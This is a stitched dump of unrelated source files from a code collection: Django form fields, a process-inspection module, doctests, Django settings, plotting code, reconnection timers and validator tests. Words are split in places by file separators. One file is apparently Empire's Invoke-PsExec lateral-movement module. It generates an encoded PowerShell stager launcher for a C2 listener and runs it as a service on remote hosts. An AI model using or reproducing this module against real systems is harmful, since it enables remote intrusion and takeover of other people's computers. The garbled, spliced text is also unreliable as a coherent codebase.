raise forms.ValidationError(self.error_messages['invalid_year'])
return date(year, month, day)
return None
class VerificationValueField(forms.CharField):
"""
Form field that validates credit card verification values (e.g. CVV2).
See http://en.wikipedia.org/wiki/Card_Security_Code
"""
widget = forms.TextInput(attrs={'maxlength': 4})
default_error_messages = {
'required': _(u'Please enter the three- or four-digit verification code for your credit card.'),
'invalid': _(u'The verification value you entered is invalid.'),
}
def clean(self, value):
value = value.replace(' ', '')
if not value and self.required:
raise forms.util.ValidationError(self.error_messages['required'])
if value and not re.match(VERIFICATION_VALUE_RE, value):
raise forms.util.ValidationError(self.error_messages['invalid'])
return value
|
FrostyX/tracer
|
tracer/resources/processes.py
|
Python
|
gpl-2.0
| 9,071
| 0.026127
|
#-*- coding: utf-8 -*-
# processes.py
# Module providing informations about processes
#
# Copyright (C) 2016 Jakub Kadlcik
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# the GNU General Public License v.2, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the
# GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
#
from .collections import ProcessesCollection
from .FilenameCleaner import FilenameCleaner
import psutil
import datetime
import time
import os
import re
from subprocess import PIPE, Popen
from threading import Timer
from six import with_metaclass
class Processes(object):
# psutil 3.x to 1.x backward compatibility
@staticmethod
def pids():
try:
return psutil.pids()
except AttributeError:
return psutil.get_pid_list()
@staticmethod
def all():
processes = ProcessesCollection()
for pid in Processes.pids():
try:
processes.append(Process(pid))
except psutil.NoSuchProcess: pass
except psutil.AccessDenied: pass
return processes
class ProcessWrapper(object):
"""
Wrapper for ``psutil.Process class``
Library ``psutil`` is not backward compatible from version 2.x.x to 1.x.x.
Purpose of this class is cover incompatibility in ``psutil.Process`` class and
provide interface of new version. It allows using new interface even with
old version of ``psutil``.
Note that, for performance reasons, process information is cached at
object creation. To force a refresh, invoke the ``rebuild_cache()``
method.
"""
def __init__(self, pid=None):
self._process = psutil.Process(pid)
self.rebuild_cache()
def __nonzero__(self):
return bool(self._process)
def rebuild_cache(self):
self._procdict = self._process.as_dict(attrs=['name', 'exe', 'cmdline', 'ppid', 'username', 'create_time'])
def name(self):
# Special case for sshd, if its cmd contains the execuatable is must be the daemon
# else must be the session.
try:
if self._attr("name") == 'sshd':
if self._attr("exe") not in self._attr("cmdline") and len(self._attr("cmdline")) > 1:
return 'ssh-{0}-session'.format(re.split(' |@',' '.join(self._attr("cmdline")))[1])
except psutil.AccessDenied:
pass
return self._attr("name")
def exe(self):
return self._attr("exe")
def cmdline(self):
return self._attr("cmdline")
def ppid(self):
return self._attr("ppid")
def parent(self):
return self._attr("parent")
def username(self):
return self._attr("username")
def create_time(self):
return self._attr("create_time")
def children(self, recursive=False):
key = 'children-{0}'.format(recursive)
if key not in self._procdict:
try:
self._procdict[key] = self._process.children(recursive)
except AttributeError:
self._procdict[key] = self._process.get_children(recursive)
return self._procdict[key]
def _attr(self, name):
if name not in self._procdict:
attr = getattr(self._process, name)
try:
self._procdict[name] = attr()
except TypeError:
self._procdict[name] = attr
return self._procdict[name]
def __getattr__(self, item):
return getattr(self._process, item)
# psutil 3.x to 1.x backward compatibility
def memory_maps(self, grouped=True):
key = 'memory_maps-{0}'.format(grouped)
if key not in self._procdict:
try:
self._procdict[key] = self._process.memory_maps(grouped=grouped)
except AttributeError:
self._procdict[key] = self._process.get_memory_maps(grouped=grouped)
return self._procdict[key]
class ProcessMeta(type):
"""
Caching metaclass that ensures that only one ``Process`` object is ever
instantiated for any given PID. The cache can be cleared by calling
``Process.reset_cache()``.
Based on https://stackoverflow.com/a/33458129
"""
def __init__(cls, name, bases, attributes):
super(ProcessMeta, cls).__init__(name, bases, attributes)
def reset_cache():
cls._cache = {}
reset_cache()
setattr(cls, 'reset_cache', reset_cache)
def __call__(cls, *args, **kwargs):
pid = args[0]
if pid not in cls._cache:
self = cls.__new__(cls, *args, **kwargs)
cls.__init__(self, *args, **kwargs)
cls._cache[pid] = self
return cls._cache[pid]
class Process(with_metaclass(ProcessMeta, ProcessWrapper)):
"""
Represent the process instance uniquely identifiable through PID
For all class properties and methods, please see
http://pythonhosted.org/psutil/#process-class
Below listed are only reimplemented ones.
For performance reasons, instances are cached based on PID, and
multiple instantiations of a ``Process`` object with the same PID will
return the same object. To clear the cache, invoke
``Process.reset_cache()``. Additionally, as with ``ProcessWrapper``,
process information is cached at object creation. To force a refresh,
invoke the ``rebuild_cache()`` method on the object.
"""
def __eq__(self, process):
"""For our purposes, two processes are equal when they have same name"""
return self.pid == process.pid
def __ne__(self, process):
return not self.__eq__(process)
def __hash__(self):
return hash(self.pid)
@staticmethod
def safe_isfile(file_path, timeout=0.5):
"""
Process arguments could be referring to files on remote filesystems and
os.path.isfile will hang forever if the shared FS is offline.
Instead, use a subprocess that we can time out if we can't reach some file.
"""
process = Popen(['test', '-f', file_path], stdout=PIPE, stderr=PIPE)
timer = Timer(timeout, process.kill)
try:
timer.start()
process.communicate()
return process.returncode == 0
finally:
timer.cancel()
@property
def files(self):
files = []
# Files from memory maps
for mmap in self.memory_maps():
files.append(FilenameCleaner.strip(mmap.path))
# Process arguments
for arg in self.cmdline()[1:]:
if not os.path.isabs(arg):
continue
if Process.safe_isfile(arg):
files.append(arg)
return sorted(files)
def parent(self):
"""The parent process casted from ``psutil.Process`` to tracer ``Process``"""
if self.ppid():
return Process(self.ppid())
return None
def username(self):
"""The user who owns the process. If user was deleted in the meantime,
``None`` is returned instead.""
|
"
# User who run the process can be deleted
try:
return super(Process, self).username()
except KeyError:
return None
def children(self, recursive=False):
"""The collection of process's children. Ea
|
ch of them casted from ``psutil.Process``
to tracer ``Process``."""
children = super(Process, self).children(recursive)
return ProcessesCollection([Process(child.pid) for child in children])
@property
def exe(self):
"""The absolute path to process executable. Cleaned from arbitrary strings
which appears on the end."""
# On Gentoo, there is #new after some files in lsof
# i.e. /usr/bin/gvim#new (deleted)
exe = super(Process, self).exe()
if exe.endswith('#new'):
exe = exe[0:-4]
# On Fedora, there is something like ;541350b3 after some files in lsof
if ';' in exe:
exe = exe[0:exe.index(';')]
return exe
@property
def is_interpreted(self):
# @TODO implement better detection of interpreted processes
return self.name() in ["python"]
@property
def is_session(self):
terminal = self.terminal()
if terminal is None:
return None
parent = self.parent()
if parent is None or terminal != parent.terminal():
return True
@property
def real_name(self):
if self.is_interpreted:
for arg in self.cmdline()[1:]:
if os.path.isfile(arg):
return os.path.basename(arg)
return self.name()
@property
def str_started_ago(self):
"""
The time of how long process is running. Returned as string
in format ``XX unit`` where unit is one of
|
xfire/guppy
|
test/doctest_assertions.py
|
Python
|
gpl-2.0
| 3,440
| 0
|
#!/usr/bin/env python
#
# vim:syntax=python:sw=4:ts=4:expandtab
"""
test hasAttributes()
---------------------
>>> from guppy import hasAttributes
>>> class Foo(object):
... def __init__(self):
... self.a = 23
... self.b = 42
>>> hasAttributes('a')(Foo())
True
>>> hasAttributes('b')(Foo())
True
>>> hasAttributes('a', 'b')(Foo())
True
>>> hasAttributes('c')(Foo())
False
"""
"""
test hasMethods()
-----------------
>>> from guppy import hasMethods
>>> class Bar(object):
... def a(self): return 23
... def b(self): return 42
>>> hasMethods('a')(Bar())
True
>>> hasMethods('b')(Bar())
True
>>> hasMethods('b', 'a')(Bar())
True
>>> hasMethods('c')(Bar())
False
"""
"""
test isInstanceOf()
-------------------
>>> from guppy import isInstanceOf
>>> class BA(object): pass
>>> class BB(object): pass
>>> class C(BA, BB): pass
>>> isInstanceOf(str)("test")
True
>>> isInstanceOf(list)([1,2,3])
True
>>> isInstanceOf(dict)(dict(a = 23))
True
>>> isInstanceOf(BA, BB, C)(C())
True
>>> isInstanceOf(int)("test")
False
>>> isInstanceOf(list)("test")
False
>>> isInstanceOf(BB, C)(BA())
False
"""
"""
test implementProtocol()
------------------------
>>> from guppy import implementProtocol, Protocol
>>> class FooBarProtocol(Protocol):
... def foo(): pass
... def bar(): pass
>>> class SpamEggsProtocol(Protocol):
... def spam(): pass
... def eggs(): pass
>>> class AllProtocol(FooBarProtocol, SpamEggsProtocol): pass
>>> class FooBar(object):
... def foo(): pass
... def bar(): pass
>>> class SpamEggs(object):
... def spam(): pass
... def eggs(): pass
>>> class AllInherit(FooBar, SpamEggs): pass
>>> class All(object):
... def foo(): pass
... def bar(): pass
... def spam(): pass
... def eggs(): pass
>>> implementProtocol(FooBarProtocol)(FooBar())
True
>>> implementProtocol(SpamEggsP
|
rotocol)(FooBar())
False
>>> implementProtocol(AllProtocol)(FooBar())
False
>>> implementProtocol(SpamEggsProtocol)(SpamEggs())
True
>>> implementProtocol
|
(FooBarProtocol)(SpamEggs())
False
>>> implementProtocol(AllProtocol)(SpamEggs())
False
>>> implementProtocol(SpamEggsProtocol)(All())
True
>>> implementProtocol(FooBarProtocol)(All())
True
>>> implementProtocol((SpamEggsProtocol, FooBarProtocol))(All())
True
>>> implementProtocol(AllProtocol)(All())
True
>>> implementProtocol(SpamEggsProtocol)(AllInherit())
True
>>> implementProtocol(FooBarProtocol)(AllInherit())
True
>>> implementProtocol((SpamEggsProtocol, FooBarProtocol))(AllInherit())
True
>>> implementProtocol(AllProtocol)(AllInherit())
True
>>> implementProtocol(SpamEggsProtocol)('')
False
>>> implementProtocol(FooBarProtocol)('')
False
>>> implementProtocol(AllProtocol)('')
False
>>> implementProtocol(str)('')
True
>>> implementProtocol(list)('')
False
>>> implementProtocol(list)([])
True
>>> implementProtocol(str)([])
False
>>> implementProtocol(dict)({})
True
>>> implementProtocol(list)({})
False
"""
|
ella/django-ratings
|
tests/example_project/settings/config.py
|
Python
|
bsd-3-clause
| 1,465
| 0.004778
|
from tempfile im
|
port gettempdir
from os.path import join, dirname
import example_project
ADMINS = (
)
MANAGERS = ADMINS
DEBUG = True
TEMPLATE_DEBUG = DEBUG
DISABLE_CACHE_TEMPLATE = DEBUG
DATABASE_ENGINE = 'sqlite3'
DATABASE_NAME = join(gettempdir(), 'django_ratings_example_project.db')
TEST_DATABASE_NAME =joi
|
n(gettempdir(), 'test_django_ratings_example_project.db')
DATABASE_USER = ''
DATABASE_PASSWORD = ''
DATABASE_HOST = ''
DATABASE_PORT = ''
TIME_ZONE = 'Europe/Prague'
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
USE_I18N = True
# Make this unique, and don't share it with anybody.
SECRET_KEY = '88b-01f^x4lh$-s5-hdccnicekg07)niir2g6)93!0#k(=mfv$'
EMAIL_SUBJECT_PREFIX = 'Example project admin: '
# templates for this app
DEBUG = True
TEMPLATE_DEBUG = DEBUG
DISABLE_CACHE_TEMPLATE = DEBUG
# TODO: Fix logging
# init logger
#LOGGING_CONFIG_FILE = join(dirname(testbed.__file__), 'settings', 'logger.ini')
#if isinstance(LOGGING_CONFIG_FILE, basestring) and isfile(LOGGING_CONFIG_FILE):
# logging.config.fileConfig(LOGGING_CONFIG_FILE)
# LOGGING_CONFIG_FILE = join( dirname(__file__), 'logger.conf')
# we want to reset whole cache in test
# until we do that, don't use cache
CACHE_BACKEND = 'dummy://'
# session expire
SESSION_EXPIRE_AT_BROWSER_CLOSE = True
# disable double render in admin
# DOUBLE_RENDER = False
MEDIA_ROOT = join(dirname(example_project.__file__), 'static')
MEDIA_URL = '/static/'
ADMIN_MEDIA_PREFIX = '/static/admin_media/'
|
ajkerr0/kappa
|
kappa/plot.py
|
Python
|
mit
| 16,060
| 0.022167
|
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 22 14:18:45 2016
@author: Alex Kerr
Define functions that draw molecule objects.
"""
import copy
from itertools import cycle
import matplotlib.pyplot as plt
from matplotlib import colors
from mpl_toolkits.mplot3d import Axes3D
import numpy as np
from .molecule import chains
plt.close("all")
atomColors = {1:"white",6:"black",7:"skyblue",8:"red",9:"green",15:"orange",16:"yellow",17:"green",35:"orange",
21:"white", 22:"red", 23:"green", 24:"blue", 25:"orange"}
atomicRadii = {1:25,6:70,7:65,8:60,9:50,15:100,16:100,17:100,35:115,
21:120, 22:150, 23:190, 24:200, 25:210}
radList = np.zeros(max(list(atomicRadii.items()))[0]+1, dtype=np.int16)
for key,value in atomicRadii.items():
radList[key] = value
def bonds(molecule, sites=False, indices=False, faces=False, order=False,
atomtypes=False, linewidth=4.):
"""Draw a 2d 'overhead' view of a molecule."""
fig = plt.figure()
figTitle = molecule.name
posList = molecule.posList
length = len(molecule)
for bond in molecule.bondList:
i,j = bond
plt.plot([posList[i][0],posList[j][0]],
[posList[i][1],posList[j][1]],
color='k', zorder=-1, linewidth=linewidth)
cList = np.zeros([length,3])
if sites:
for count in range(len(molecule)):
cList[count] = colors.hex2color(colors.cnames[atomColors[molecule.zList[count]]])
plt.scatter(posList[:,0],posList[:,1],s=1.5*radList[molecule.zList],c=cList,
edgecolors='k')
if indices:
for index, pos in enumerate(molecule.posList):
plt.annotate(index, (pos[0]+.1, pos[1]+.1), color='b', fontsize=10)
if atomtypes:
for atomtype, pos in zip(molecule.atomtypes, molecule.posList):
plt.annotate(atomtype, (pos[0]-.5, pos[1]-.5), color='b', fontsize=10)
if faces:
for i,face in enumerate(molecule.faces):
openAtoms = [x for x in face.atoms if x not in face.closed]
plt.plot(face.pos[0],face.pos[1], 'rx', markersize=15., zorder=-2)
plt.scatter(posList[openAtoms][:,0], posList[openAtoms][:,1], s=75., c='red')
plt.scatter(posList[face.closed][:,0], posList[face.closed][:,1], s=40, c='purple')
plt.annotate(i, (face.pos[0]-.35*face.norm[0], face.pos[1]-.35*face.norm[1]),
color='r', fontsize=20)
if np.linalg.norm(face.norm[:2]) > 0.0001:
plt.quiver(face.pos[0]+.5*face.norm[0], face.pos[1]+.5*face.norm[1], 5.*face.norm[0], 5.*face.norm[1],
color='r', headwidth=1, units='width', width=5e-3, headlength=2.5)
if order:
for index, bo in enumerate(molecule.bondorder):
i,j = molecule.bondList[index]
midpoint = (molecule.posList[i]+molecule.posList[j])/2.
plt.annotate(bo, (midpoint[0], midpoint[1]), color='k', fontsize=20)
fig.suptitle(figTitle, fontsize=18)
plt.axis('equal')
plt.xlabel('x-position', fontsize=13)
plt.ylabel('y-position', fontsize=13)
plt.show()
def bondsax(molecule, ax, sites=False, indices=False, faces=False, order=False,
atomtypes=False, linewidth=4., size_scale=1.):
"""Draw a 2d 'overhead' view of a molecule.
|
"""
plt.sca(ax)
posList = molecule.posList
length = len(molecule)
for bond in molecule.bondList:
i,j = bond
plt.plot([posList[i][0],posList[j][0]],
[posList[i][1],posList[j][1]],
color='k', zorder=-1, linewidth=linewidth)
cList = np.zeros([length,3])
if sites:
for count in range(len(molecule)):
cList[count] = colors.hex2color(colors.cnames[atomColors[molecule.zLi
|
st[count]]])
plt.scatter(posList[:,0],posList[:,1],s=1.5*radList[molecule.zList]*size_scale,c=cList,
edgecolors='k')
if indices:
for index, pos in enumerate(molecule.posList):
plt.annotate(index, (pos[0]+.1, pos[1]+.1), color='b', fontsize=10)
if atomtypes:
for atomtype, pos in zip(molecule.atomtypes, molecule.posList):
plt.annotate(atomtype, (pos[0]-.5, pos[1]-.5), color='b', fontsize=10)
if faces:
for i,face in enumerate(molecule.faces):
openAtoms = [x for x in face.atoms if x not in face.closed]
plt.plot(face.pos[0],face.pos[1], 'rx', markersize=15., zorder=-2)
plt.scatter(posList[openAtoms][:,0], posList[openAtoms][:,1], s=75., c='red')
plt.scatter(posList[face.closed][:,0], posList[face.closed][:,1], s=40, c='purple')
plt.annotate(i, (face.pos[0]-.35*face.norm[0], face.pos[1]-.35*face.norm[1]),
color='r', fontsize=20)
if np.linalg.norm(face.norm[:2]) > 0.0001:
plt.quiver(face.pos[0]+.5*face.norm[0], face.pos[1]+.5*face.norm[1], 5.*face.norm[0], 5.*face.norm[1],
color='r', headwidth=1, units='width', width=5e-3, headlength=2.5)
if order:
for index, bo in enumerate(molecule.bondorder):
i,j = molecule.bondList[index]
midpoint = (molecule.posList[i]+molecule.posList[j])/2.
plt.annotate(bo, (midpoint[0], midpoint[1]), color='k', fontsize=20)
plt.axis('equal')
plt.show()
def scatter_obj(size_scale, fs):
"""
Return a scatter object for legend purposes.
"""
fig, ax = plt.subplots()
x,y = [], []
c, s = [],[]
for i, z, name in zip(np.arange(6), [1,6,9,17,35], ['H', 'C', 'F', 'Cl', 'Br']):
x.append(0.)
y.append(-i*.2)
c.append(atomColors[z])
s.append(1.5*size_scale*radList[z])
ax.text(.005, -i*.2, name, fontsize=fs)
ax.scatter(x,y , c=c, s=s, edgecolors='k')
ax.axis('off')
def bonds3d(molecule, sites=False, indices=False, save=False,
linewidth=2.):
"""Draw the molecule's bonds
Keywords:
sites (bool): Set True to draw atomic sites. Default is False.
indices (bool): Set True to draw atomic site indices near atomic sites. Default is False."""
fig = plt.figure()
ax=Axes3D(fig)
figTitle = molecule.name
plotSize = 5
posList = molecule.posList/molecule.ff.lunits
length = len(posList)
for bond in molecule.bondList:
i,j = bond
ax.plot([posList[i][0],posList[j][0]],
[posList[i][1],posList[j][1]],
[posList[i][2],posList[j][2]],
color='k', zorder=-1, linewidth=linewidth)
cList = np.zeros([length,3])
if sites:
for count in range(len(molecule)):
cList[count] = colors.hex2color(colors.cnames[atomColors[molecule.zList[count]]])
ax.scatter(posList[:,0],posList[:,1],posList[:,2],
s=radList[molecule.zList],c=cList,
marker='o',depthshade=False,
edgecolors='k')
if indices:
ds = 0.1
for index,pos in enumerate(posList):
x,y,z = pos
ax.text(x+ds,y+ds,z+ds,str(index),color="blue")
fig.suptitle(figTitle, fontsize=18)
ax.grid(False)
ax._axis3don = False
ax.set_xlim3d(-plotSize,plotSize)
ax.set_ylim3d(-plotSize,plotSize)
ax.set_zlim3d(-plotSize,plotSize)
ax.set_xlabel('x-position' + ' (' + r'$\AA$' + ')')
ax.set_ylabel('y-position' + ' (' + r'$\AA$' + ')')
ax.set_zlabel('z-position' + ' (' + r'$\AA$' + ')')
if save:
plt.savefig("./kappa_save/%s.png" % molecule.name)
plt.show()
def bonds3d_list(molList, sites=False, indices=False, save=False,
linewidth=2.):
"""Draw the molecule's bonds
Keywords:
sites (bool): Set True to draw atomic sites. Default is False.
indices (bool): Set True to draw atomic site indices near atomic sites. Default is False."""
fig = plt.figure()
ax=Axes3D(fig)
|
petxo/clitellum
|
clitellum/endpoints/channels/reconnectiontimers.py
|
Python
|
gpl-3.0
| 3,471
| 0.007779
|
from time import sleep
import math
__author__ = 'sergio'
## @package clitellum.endpoints.channels.reconnectiontimers
# Este paquete contiene las clases para los temporizadores de reconexion
#
## Metodo factoria que crea una instancia de un temporizador
# instantaneo
def CreateInstantTimer():
return Instant
|
ReconnectionTimer()
## Metodo factoria que crea una instancia de un temporizador
# logaritmico
def CreateLogarithmicTimer():
return LogarithmicReconnec
|
tionTimer()
## Metodo factoria que crear una instancia de un temporizador de tiempo constante
def CreateConstantTimer(waiting_time=5):
return ConstantReconnectionTimer(waiting_time=waiting_time)
## Crea una temporizador en funcion del tipo especificado
# @param type Tipo de temporizador "Instant", "Logarithmic"
def CreateTimerFormType(type):
if type == "Instant":
return CreateInstantTimer()
elif type == 'Constant':
return ConstantReconnectionTimer()
else:
return CreateLogarithmicTimer()
## Crea un temporizador a partir de una configuracion
# { type :'Instant' }
# { type :'Constant', time : 10 }
# { type :'Logarithmic' }
def CreateTimerFormConfig(config):
if config['type'] == "Instant":
return CreateInstantTimer()
elif config['type'] == 'Constant':
if not config.get['time'] is None:
return ConstantReconnectionTimer(config['time'])
else:
return ConstantReconnectionTimer()
else:
return CreateLogarithmicTimer()
## Clase base que proporciona la estructura basica de un temporizador de reconexion
class ReconnectionTimer:
## Crea una instancia del temporizador de reconexion
def __init__(self):
pass
## Se espera una vuelta del ciclo antes de continuar
def wait(self):
pass
## Reinicia el temporizador
def reset(self):
pass
## Clase que proporciona un temporizador de reconexion instantaneo,
# no hay tiempo de espera entre un ciclo y el siguiente
class InstantReconnectionTimer(ReconnectionTimer):
## Crea una instancia del temporizador instantaneo
def __init__(self):
ReconnectionTimer.__init__(self)
## Convierte la instancia a string
def __str__(self):
return "Instant Reconnection Timer"
## Define un temporizador de reconexion en el que el tiempo de espera entre un ciclo
# y el siguiente es logaritmico, .
class LogarithmicReconnectionTimer(ReconnectionTimer):
def __init__(self):
ReconnectionTimer.__init__(self)
self.__seed = 1
def wait(self):
waitingTime = ((1 + (1 / self.__seed)) ^ self.__seed) * (1 + math.log10(self.__seed))
if waitingTime < 0:
waitingTime = 0
sleep(waitingTime)
self.__seed += 1
def reset(self):
self.__seed = 1
## Convierte la instancia a string
def __str__(self):
return "Logarithmic Reconnection Timer, seed: %s" % self.__seed
## Define un temporizador de reconexion en el que el tiempo de espera entre un ciclo
# y el siguiente es logaritmico, .
class ConstantReconnectionTimer(ReconnectionTimer):
def __init__(self, waiting_time=5):
ReconnectionTimer.__init__(self)
self.__waiting_time = waiting_time
def wait(self):
sleep(self.__waiting_time)
def reset(self):
pass
## Convierte la instancia a string
def __str__(self):
return "Constant Reconnection Timer, seed: %s" % self.__waiting_time
|
qbuat/rootpy
|
examples/stats/plot_quantiles.py
|
Python
|
gpl-3.0
| 1,944
| 0.002058
|
#!/usr/bin/env python
"""
=================================================
Draw a Quantile-Quantile Plot and Confidence Band
=================================================
This is an example of drawing a quantile-quantile plot with a confidence level
(CL) band.
"""
print __doc__
import ROOT
from rootpy.interactive import wait
from rootpy.plotting import Hist, Canvas, Legend, set_style
from rootpy.plotting.contrib.quantiles import qqgraph
set_style('ATLAS')
c = Canvas(width=1200, height=600)
c.Divide(2, 1, 1e-3, 1e-3)
rand = ROOT.TRandom3()
h1 = Hist(100, -5, 5, name="h1", title="Histogram 1",
linecolor='red', legendstyle='l')
h2 = Hist(100, -5, 5, name="h2", title="Histogram 2",
linecolor='blue', legendstyle='l')
for ievt in xrange(10000):
h1.Fill(rand.Gaus(0, 0.8))
h2.Fill(rand.Gaus(0, 1))
pad = c.cd(1)
h1.Draw('hist')
h2.Draw('hist same')
leg = Legend([h1, h2], pad=pad, leftmargin=0.5,
topmargin=0.11, righ
|
tmargin=0.05,
textsize=20)
leg.Draw()
pad = c.cd(2)
gr = qqgraph(h1, h2)
gr.xaxis.title = h1.title
gr.yaxis.title = h2.title
gr.fillcolor = 17
gr.fillstyle = 'solid'
gr.linecolor = 17
gr.markercolor = 'darkred'
gr.markerstyle = 20
gr.title = "QQ with CL"
gr.Draw("ap")
x_min = gr.GetXaxis().GetXmin()
x_max = gr.GetXaxis().GetXmax()
y_min = gr.GetXaxis().GetXmin()
y_max = gr.GetXax
|
is().GetXmax()
gr.Draw('a3')
gr.Draw('Xp same')
# a straight line y=x to be a reference
f_dia = ROOT.TF1("f_dia", "x",
h1.GetXaxis().GetXmin(),
h1.GetXaxis().GetXmax())
f_dia.SetLineColor(9)
f_dia.SetLineWidth(2)
f_dia.SetLineStyle(2)
f_dia.Draw("same")
leg = Legend(3, pad=pad, leftmargin=0.45,
topmargin=0.45, rightmargin=0.05,
textsize=20)
leg.AddEntry(gr, "QQ points", "p")
leg.AddEntry(gr, "68% CL band", "f")
leg.AddEntry(f_dia, "Diagonal line", "l")
leg.Draw()
c.Modified()
c.Update()
c.Draw()
wait()
|
thebarbershopper/Empire
|
lib/modules/lateral_movement/invoke_psexec.py
|
Python
|
bsd-3-clause
| 5,198
| 0.012697
|
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-PsExec',
'Author': ['@harmj0y'],
'Description': ('Executes a stager on remote hosts using PsExec type functionality.'),
'Background' : True,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : False,
'MinPSVersion' : '2',
'Comments': [
'https://github.com/rapid7/metasploit-framework/blob/master/tools/psexec.rb'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : False,
'Value' : ''
},
'ComputerName' : {
'Description' : 'Host[s] to execute the stager on, comma separated.',
'Required' : True,
'Value' : ''
},
'ServiceName' : {
'Description' : 'The name of the service to create.',
'Required' : True,
'Value' : 'Updater'
},
'Command' : {
'Description' : 'Custom command to execute on remote hosts.',
'Required' : False,
'Value' : ''
},
'ResultFile' : {
'Description' : 'Name of the file to write the results to on agent machine.',
'Required' : False,
'Value' : ''
},
'UserAgent' : {
|
'Description' : 'User-agent strin
|
g to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
listenerName = self.options['Listener']['Value']
computerName = self.options['ComputerName']['Value']
serviceName = self.options['ServiceName']['Value']
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
command = self.options['Command']['Value']
resultFile = self.options['ResultFile']['Value']
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/lateral_movement/Invoke-PsExec.ps1"
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
if command != "":
# executing a custom command on the remote machine
return ""
# if
else:
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print helpers.color("[!] Invalid listener: " + listenerName)
return ""
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = self.mainMenu.stagers.generate_launcher(listenerName, encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
if launcher == "":
print helpers.color("[!] Error in launcher generation.")
return ""
else:
stagerCmd = '%COMSPEC% /C start /b C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher
script += "Invoke-PsExec -ComputerName %s -ServiceName \"%s\" -Command \"%s\"" % (computerName, serviceName, stagerCmd)
script += "| Out-String | %{$_ + \"`n\"};"
return script
|
mandawilson/cbioportal
|
core/src/test/scripts/system_tests_validate_data.py
|
Python
|
agpl-3.0
| 11,621
| 0.001807
|
#!/usr/bin/env python3
'''
Copyright (c) 2016 The Hyve B.V.
This code is licensed under the GNU Affero General Public License (AGPL),
version 3, or (at your option) any later version.
'''
import unittest
import logging
import tempfile
import os
import shutil
import time
import difflib
from importer import validateData
try:
WindowsError
except NameError:
WindowsError = None
# globals:
PORTAL_INFO_DIR = 'test_data/api_json_system_tests'
class ValidateDataSystemTester(unittest.TestCase):
'''Test cases around running the complete validateData script
(such as "does it return the correct exit status?" or "does it generate
the html report when requested?", etc)
'''
def setUp(self):
_resetClassVars()
# Prepare global variables related to sample profiled for mutations and gene panels
self.mutation_sample_ids = None
self.mutation_file_sample_ids = set()
self.fusion_file_sample_ids = set()
def tearDown(self):
"""Close logging handlers after running validator and remove tmpdir."""
# restore original function
validateData.mutation_sample_ids = None
validateData.mutation_file_sample_ids = set()
validateData.fusion_file_sample_ids = set()
# get the logger used in validateData.main_validate()
validator_logger = logging.getLogger(validateData.__name__)
# flush and close all handlers of this logger
for logging_handler in validator_logger.handlers:
logging_handler.close()
# remove the handlers from the logger to reset it
validator_logger.handlers = []
super(ValidateDataSystemTester, self).tearDown()
def assertFileGenerated(self, tmp_file_name, expected_file_name):
"""Assert that a file has been generated with the expected contents."""
self.assertTrue(os.path.exists(tmp_file_name))
with open(tmp_file_name, 'r') as out_file, \
open(expected_file_name, 'r') as ref_file:
base_filename = os.path.basename(tmp_file_name)
diff_result = difflib.context_diff(
ref_file.readlines(),
out_file.readlines(),
fromfile='Expected {}'.format(base_filename),
tofile='Generated {}'.format(base_filename))
diff_line_list = list(diff_result)
self.assertEqual(diff_line_list, [],
msg='\n' + ''.join(diff_line_list))
# remove temp file if all is fine:
try:
os.remove(tmp_file_name)
except WindowsError:
# ignore this Windows specific error...probably happens because of virus scanners scanning the temp file...
pass
def test_exit_status_success(self):
'''study 0 : no errors, expected exit_status = 0.
If there are errors, the script should return
0: 'succeeded',
1: 'failed',
2: 'not performed as problems occurred',
3: 'succeeded with warnings'
'''
# build up the argument list
print("===study 0")
args = ['--study_directory', 'test_data/study_es_0/',
'--portal_info_dir', PORTAL_INFO_DIR, '-v']
# execute main function with arguments provided as if from sys.argv
args = validateData.interface(args)
exit_status = validateData.main_validate(args)
self.assertEqual(0, exit_status)
def test_exit_status_failure(self):
'''study 1 : errors, expected exit_status = 1.'''
#Build up arguments and run
print("===study 1")
args = ['--study_directory', 'test_data/study_es_1/',
'--portal_info_dir', PORTAL_INFO_DIR, '-v']
args = validateData.interface(args)
# Execute main function with arguments provided through sys.argv
exit_status = validateData.main_validate(args)
self.assertEqual(1, exit_status)
def test_exit_status_invalid(self):
'''test to fail: give wrong hugo file, or let a meta file point to a non-existing data file, expected exit_status = 2.'''
#Build up arguments and run
print("===study invalid")
args = ['--study_directory', 'test_data/study_es_invalid/',
'--portal_info_dir', PORTAL_INFO_DIR, '-v']
args = validateData.interface(args)
# Execute main function with arguments provided through sys.argv
exit_status = validateData.main_validate(args)
self.assertEqual(2, exit_status)
def test_exit_status_warnings(self):
'''study 3 : warnings only, expected exit_status = 3.'''
# data_filename: test
#Build up arguments and run
